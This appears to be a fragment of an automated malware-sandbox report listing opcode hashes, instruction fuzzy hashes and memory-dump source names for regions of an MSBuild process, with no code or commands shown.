                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6a456e0e5c3ed4760df2f1b9111baea6b23f083fe7de2782110a8fe211bdcacd
                                                                                                                                                                                                                                                • Instruction ID: 1c1bf8a8017a5f4526d45b2b2b7fd4e5cd2462f34b4d99f1abda8df7bfaed6d8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a456e0e5c3ed4760df2f1b9111baea6b23f083fe7de2782110a8fe211bdcacd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FF05E763002109F8618E739D89085AB3E6FF882613500779E10ACB791EF24EC04CBD1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0acb5b568cf9efb3741f9c7d95e42a617064595c6df7fa043323a096d8e69039
                                                                                                                                                                                                                                                • Instruction ID: d96346bf4df5e98b2707687ea9269b234f258b831793d8391dcfa81835e13cdc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0acb5b568cf9efb3741f9c7d95e42a617064595c6df7fa043323a096d8e69039
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA01317090031EDBEB10FF66F9859D933F9F740224B208791D40887218EB71BE059F95
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 106fac14a5d61ddb6d18d213948f6ab3163d4588b848795e36e11e3dec338e9e
                                                                                                                                                                                                                                                • Instruction ID: 02be5b232a409c876cf7da14d2ad540b542236ff717b36428690bd9834ea047c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 106fac14a5d61ddb6d18d213948f6ab3163d4588b848795e36e11e3dec338e9e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AF0BE75E08248DFCB40DFE8D8904ADBBB1FBCA311F148199D259DB355D731A906DB80
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3f5eeff4198ed225c0027f0e3ed03816c0927dc833eb9f9fc710e85c310e1409
                                                                                                                                                                                                                                                • Instruction ID: c093e650f6bec2414815513ed10eff6c781be673b81058929ed302ff4c670476
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f5eeff4198ed225c0027f0e3ed03816c0927dc833eb9f9fc710e85c310e1409
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4FE022B6648BB60EDB331AAC20003A2BFD54B82160F0C89BAC4CA8A9C1C252D40887E1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                • Opcode ID: 34bdc6885fbd33285b598437803e0e2c2a7490f2c2a578d8316454c0e859fbd3
                                                                                                                                                                                                                                                • Instruction ID: 9ac636e37245fd431a498b952e8cc8234f1d92d16562c6dc4aa799e91b8a913a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34bdc6885fbd33285b598437803e0e2c2a7490f2c2a578d8316454c0e859fbd3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EBE0D81262EAE05FC303976CAC302D9BF71AF8756430A41D7C4E4DB1A3E51C5C5583E2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3dceefe216f1564a826977867c41a34268c524026a4ab94414b40e52563098ac
                                                                                                                                                                                                                                                • Instruction ID: a1c87523e005f5f21c072acc8cb2c8b925e0851a78b4350b57b230a75935a8ee
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3dceefe216f1564a826977867c41a34268c524026a4ab94414b40e52563098ac
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FEE04F763001149BC7109A4EE444D9ABBAEEBD97717048077FA09CB360CA71EC5286A4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 274f15486e893891d746959ec75dd0cb5980164e9ee145216df7797a87205557
                                                                                                                                                                                                                                                • Instruction ID: 97122e351de7f5a7175b2fd476aa2ba7aeade22b71ee550e6dd57724c3225ffe
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 274f15486e893891d746959ec75dd0cb5980164e9ee145216df7797a87205557
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4F01570E0934CAFCB05EBA8D85458CBFB1AF45200F0084EAD484E7352EA345A15CF82
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 652b9fe8c9930433ddbf8811e09f674324333c3e7384c0a61a179567f5c5d46b
                                                                                                                                                                                                                                                • Instruction ID: af93ff77d1b6849e5be66844a3468f445441d1ea96384c9f201080d9951cd252
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 652b9fe8c9930433ddbf8811e09f674324333c3e7384c0a61a179567f5c5d46b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9E0D8F5610234AFC604E765D8505D93795AF88120B0147DAD9495F395CE60EC068BC7
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d88a0050c2d516acd64a70350079c9970b9474ce8040a11425443973ad92fa14
                                                                                                                                                                                                                                                • Instruction ID: 7b5c6737d110b6705a2984a34e22c707fe65509977157f538daa4f4ef3bf3572
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d88a0050c2d516acd64a70350079c9970b9474ce8040a11425443973ad92fa14
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3CE026302043425BCB12D731E8808967BE5DF493203058967D959CB611EB60F841CF91
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0b6f1e0d3274c012ef93bae569aae1f9605a46aa6946d6730c8687974cfee659
                                                                                                                                                                                                                                                • Instruction ID: 1fe44da260ed98d712b87475b7dc20f5862528b96939f4dcc9797c482a985a96
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b6f1e0d3274c012ef93bae569aae1f9605a46aa6946d6730c8687974cfee659
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CE0D838905344AFC700DB60F801969BF78BB81304F1441DADC4457382C7315F15DB91
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 98199f9bc7556d17e0673f10313f443e43581883fcbd6a1bf05eaeee832a3356
                                                                                                                                                                                                                                                • Instruction ID: d7ceb21b86af072fa5eaa0e0c26ba1e5275eabfcbfeb34c2588df1a888eb943d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 98199f9bc7556d17e0673f10313f443e43581883fcbd6a1bf05eaeee832a3356
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDD05E72305211270715695E688846BBA8FE7C9965354403AFA0AC3344DE909C0246D0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1be046ae82ecba982f87cb635e7df0448a548b4a486a77286d4db9c70dac0029
                                                                                                                                                                                                                                                • Instruction ID: 0140af7b56c7b6dfe1b5ef09e597151cb45c7b257454a05a702c523b28aa20dd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1be046ae82ecba982f87cb635e7df0448a548b4a486a77286d4db9c70dac0029
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70D0CD373002047B4B145D95A800C6BBB6FEBC4720304812DFA4146100CB71BC159794
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e93bb23ef98f809709ae1dea3090f134c5a4b6cc8661ca2e8516699fafbde3bd
                                                                                                                                                                                                                                                • Instruction ID: 1651d0dbf54f316f5bd73dc27a6533d8e5389a63cad156300187ca3662b00c32
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e93bb23ef98f809709ae1dea3090f134c5a4b6cc8661ca2e8516699fafbde3bd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24E0C2F53102245F8604F365D85189D3396BFC812030107DAD9095F7A1CF60AC058FDA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: b9791beedf84b360c0e4d9253d4637315ad55c83ade52ba4b49039ce9b0f66c1
                                                                                                                                                                                                                                                • Instruction ID: 44cae93617120034ed733b7535b1a6a75acc66dbe7e2633f7a3b2adf0fced979
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9791beedf84b360c0e4d9253d4637315ad55c83ade52ba4b49039ce9b0f66c1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20E07574E00209EFCB94DFA8E54569DFBF5EB88304F1081AA981893340D7359A41DF81
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 53e4c6df6bb1fe284cac2660094989d112872d5c779f658aef70cabae5ab16b1
                                                                                                                                                                                                                                                • Instruction ID: 21517c1aba97080ba7279f985572af327108841a74771f3f11c7a7ac5048c6f4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 53e4c6df6bb1fe284cac2660094989d112872d5c779f658aef70cabae5ab16b1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18E0E5B0E0520FDFDF24DFA0C5587EDBBB1AB09315F185529D0127A280CB784589DF95
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f38a171be738c3287c3bbb1e99180fd611f94e31c25744e401404b7565c862b7
                                                                                                                                                                                                                                                • Instruction ID: e48e4b8b78fa98e62b45ef6dcc69015665a0c94333391ce033dcf0f182579c4b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f38a171be738c3287c3bbb1e99180fd611f94e31c25744e401404b7565c862b7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67D05BB234061477C614E549D800D5BB79E9BD4631F04867AF6158B294CAA1AC0287E5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 18842770a4b0e701db1d3401f31104cd668dabc4069b5689348b8d39bc6665cc
                                                                                                                                                                                                                                                • Instruction ID: 30e648d5052dbd55f321f7dcf7afdd0bf07860b82f80117b198f2ce8487bd076
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18842770a4b0e701db1d3401f31104cd668dabc4069b5689348b8d39bc6665cc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97D0A7F2254114ABC7128BA8DC05EE27FAEFB04719F108165F44DC3563E337E8938691
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7999374d41605ece54b36f0e1fc45aacc7538b4b1608ba0b7a26279ffd173ebc
                                                                                                                                                                                                                                                • Instruction ID: 5fa39839b48643087ad2c837da1ef3308230689e5480e0b48d36c47d9133ddf4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7999374d41605ece54b36f0e1fc45aacc7538b4b1608ba0b7a26279ffd173ebc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11E0C2B2514288EFC310CB64D148E907FDAEB01304F46C8A5E048CB143C779EC80C750
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3442bcf7444aba7cac9c99a7a9008e5fb474b9895f5234fd5436003fd7bfd9f4
                                                                                                                                                                                                                                                • Instruction ID: 73ee56776d9df090d2cd810430040d8aa5f1723acdf3822f309ff5984d7492e7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3442bcf7444aba7cac9c99a7a9008e5fb474b9895f5234fd5436003fd7bfd9f4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78E0B670E0430CAFCB44EFA9D44459DBBF5EF48310F0085E9D809E7350EA346A048F85
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: a04cd8cf0993c95f0a481b2fde10a32fb246d15242a11835475b031c6d5c197e
                                                                                                                                                                                                                                                • Instruction ID: 159c4a54e4bc72d49dee72200470c51a6b0fc36e5732c93667299a263a0b11ca
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a04cd8cf0993c95f0a481b2fde10a32fb246d15242a11835475b031c6d5c197e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7AE0EC74900208EFC794EFA8E94579CBBF4EB48204F2081AAC808D3341E7329E42DB91
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dec3397c3f075ede51bbdd07c4eecd73c1fbb6d2c1d7a92238316a8307754ce8
                                                                                                                                                                                                                                                • Instruction ID: 773fd335a9b49f47125899ebd9978894fb20b779d9f90266d2d1e53d38a96db1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dec3397c3f075ede51bbdd07c4eecd73c1fbb6d2c1d7a92238316a8307754ce8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83E0EC74E00209EFCB84EFA8E54579CBBF4EF48214F2481A98808D3341E7729E41DB81
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: a81c6190067f835e44970a9e607fea9bfb19d5c7d12f879c546d855da960c1d2
                                                                                                                                                                                                                                                • Instruction ID: a58f819d0971044ac6ffee01645040055a41b468b582e697a6e2b2d0a1cc368e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a81c6190067f835e44970a9e607fea9bfb19d5c7d12f879c546d855da960c1d2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9DE01274904209DBCB04DFA4E545A5DBBB4FB85304F1082ADC80417341C7329E42DB81
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5129908f0b0b88e96a0dc877cd033a5497a041c5d7397c4bf25d6e8bfa06fed7
                                                                                                                                                                                                                                                • Instruction ID: 59087caeb6152f575e0a7430c8489f6c1de32151a10aba7f03ff655bf5bfadd3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5129908f0b0b88e96a0dc877cd033a5497a041c5d7397c4bf25d6e8bfa06fed7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7FD01275700000CF8758DB58E4005DD77A5EFC462570104E5F206C7661CB219C558B90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f62f6d1c27637a1e0ea453e02225ea1e3ab6aecdf2e534d4a13894cdbfc83667
                                                                                                                                                                                                                                                • Instruction ID: 47ed336711a9ed3ebf8f19a2b9fa1a38fc142aaf00db3976e0cc92fbae97d580
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f62f6d1c27637a1e0ea453e02225ea1e3ab6aecdf2e534d4a13894cdbfc83667
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7DC012B5710008CFC704D75CF4045EC37A5DB8552570000A9D306CB261DB219C154F90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dfd970979b8ac0d7de91f5132d173a96eacc85d8c19a412d7a13cc2829ba9cc1
